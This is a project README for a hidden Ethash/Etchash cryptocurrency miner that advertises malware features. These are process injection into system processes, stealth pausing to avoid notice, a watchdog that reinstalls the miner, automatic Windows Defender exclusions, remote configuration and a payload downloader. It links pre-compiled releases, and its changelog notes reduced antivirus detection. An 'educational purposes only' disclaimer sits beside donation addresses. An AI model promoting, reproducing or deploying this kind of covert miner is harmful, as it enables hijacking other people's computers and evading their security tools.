Can mine any Ethash or Etchash cryptocurrency.
- .NET - Coded in C#, requires .NET Framework 4.5
- Injection (Silent/Hidden) - Hide payload behind another process like explorer.exe, conhost.exe, svchost.exe or some other process
- Idle Mining - Can be configured to mine at different usages or not at all while computer is or isn't in use
- Stealth - Pauses the miner and clears the GPU memory while any of the programs in the "Stealth Targets" option are open
- Watchdog - Replaces the miner file if removed and starts it if the injected miner is closed down
- Ethash/Etchash - Supports mining all Ethash/Etchash coins like Ethereum, Ethereum Classic, Etho, Metaverse, Ellaism, QuarkChain and others
- Remote Configuration - Can get the miner settings remotely from a URL every 100 minutes
- Bypass Windows Defender - Adds exclusions into Windows Defender for the general folders the miner uses
- Online Downloader - Can download the miner binary during runtime to greatly decrease file size and detections
Pre-Compiled: https://github.com/UnamSanctam/SilentETHMiner/releases
You can find the new wiki here or at the top of the page.
When mining with the Ethash or the Etchash algorithm you need to have enough GPU memory left to store the DAG. So for example, mining Ethereum requires you to have at least a minimum GPU memory of 4.4 GB available since that is the size of the DAG as of writing this. Due to this, GPUs that have less available memory than the required DAG are not able to mine at all. You can mine Ethash/Etchash cryptocurrencies that have a lower DAG size like Ethereum Classic (ETC). The other thing required is a recent enough CUDA or OpenCL compatible driver for your GPU.
So the requirements are as follow:
- Enough GPU memory for the DAG
- Supported drivers
- Fixed the GPU detection for systems that have custom lowercase characters like Turkish, seems like I failed the "Turkey Test" again
- Hotfix (20/07/2021): Fixed compatibility for some AMD cards and newer AMD drivers
- Greatly reduced Windows Defender detections when "Bypass Windows Defender" is enabled by replacing Assembly.Load with simply writing the payload to Temp and executing it since the folders are excluded
- Fixed the paths for systems that have custom lowercase characters like Turkish
You can view the full Changelog here
- Unam Sanctam
- Credit to NYAN CAT
I, the creator, am not responsible for any actions, and or damages, caused by this software.
You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only.
This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use.
By using this software, you automatically agree to the above.
This project is licensed under the MIT License - see the LICENSE file for details
XMR: 8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N
BTC: bc1q26uwkzv6rgsxqnlapkj908l68vl0j753r46wvq
ETH: 0x40E5bB6C61871776f062d296707Ab7B7aEfFe1Cd
ETC: 0xd513e80ECc106A1BA7Fa15F1C590Ef3c4cd16CF3
RVN: RFsUdiQJ31Zr1pKZmJ3fXqH6Gomtjd2cQe
LINK: 0x40E5bB6C61871776f062d296707Ab7B7aEfFe1Cd
DOGE: DNgFYHnZBVLw9FMdRYTQ7vD4X9w3AsWFRv
LTC: Lbr8RLB7wSaDSQtg8VEgfdqKoxqPq5Lkn3